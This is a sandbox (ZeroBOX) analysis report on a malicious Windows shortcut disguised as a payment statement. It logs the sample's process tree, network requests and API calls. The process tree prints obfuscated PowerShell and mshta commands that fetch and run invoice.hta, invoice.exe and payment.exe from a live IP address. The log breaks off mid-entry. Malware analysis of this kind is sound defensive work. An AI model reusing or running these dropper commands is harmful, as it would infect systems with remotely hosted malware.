popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Updated_Payments_Statements.link.lnk

Cobalt Strike Darkside Ransomware Generic Malware UPX Antivirus Malicious Library GIF Format OS Processor Check PE32 PE File AntiVM AntiDebug
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 Jan. 18, 2022, 4:40 p.m. Jan. 18, 2022, 4:43 p.m.
Size 2.6KB
Type MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=14, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 8bdf50e9270b6f6e3c461be75999305d
SHA256 776f2d2c4538ee81f960ac512214317e78e61728c48302356ec8734fa1d0b7e6
CRC32 BF123FD6
ssdeep 24:8A2/BHYVKVWf+/CWbll/SsrdTeF+ajUnpDh+/E4I0arab0mN:8v5ayll/by5jUNhAIZaj
Yara
  • Antivirus - Contains references to security software
  • Generic_Malware_Zero - Generic Malware
  • Lnk_Format_Zero - LNK Format

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RZcvibqEQ" C:\Users\test22\AppData\Local\Temp\Updated_Payments_Statements.link.lnk

    2192

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $dR=@(42117,42123,42112,42124,42105,42040,42112,42124,42124,42120,42066,42055,42055,42057,42063,42065,42054,42060,42059,42054,42057,42064,42063,42054,42057,42064,42059,42055,42112,42112,42110,42117,42055,42113,42118,42126,42119,42113,42107,42109,42054,42112,42124,42105);$H=@(42081,42077,42096);function J($UD){$dR=42008;$Pf=$Null;foreach($pb in $UD){$Pf+=[char]($pb-$dR)};return $Pf};sal QbxXCDZHn (J $H);QbxXCDZHn((J $dR));

      2272

      • mshta.exe "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta

        2436

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;

          1088

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
179.43.187.183 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:395
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: .EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,1
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: 3232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Star
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: t-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,132
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: 02,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]:
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: : <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadD
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: ata($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[cha
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: r]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: 220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + '
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: 3225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: cx $Q;;;}Tf;
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:395
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: .EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,1
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: 3232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Star
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: t-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,132
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: 02,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]:
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: : <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadD
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: ata($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[cha
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: r]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: 220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + '
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: 3225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: cx $Q;;;}Tf;
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000012b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5fb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5fb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5fb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f62b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f62b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f62b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f62b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f62b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f62b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5878
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f65f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f6538
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5df8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006f5bb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ebfc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ebd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ebd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002ebd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002eb908
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://179.43.187.183/hhfm/invoice.hta
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://179.43.187.183/hhfm/invoice.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://179.43.187.183/hhfm/payment.exe
request GET http://179.43.187.183/hhfm/invoice.hta
request GET http://179.43.187.183/hhfm/invoice.exe
request GET http://179.43.187.183/hhfm/payment.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ce1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ce2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02772000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02782000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b61000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02783000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02784000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0277b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02785000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02786000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bc9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04bcb000
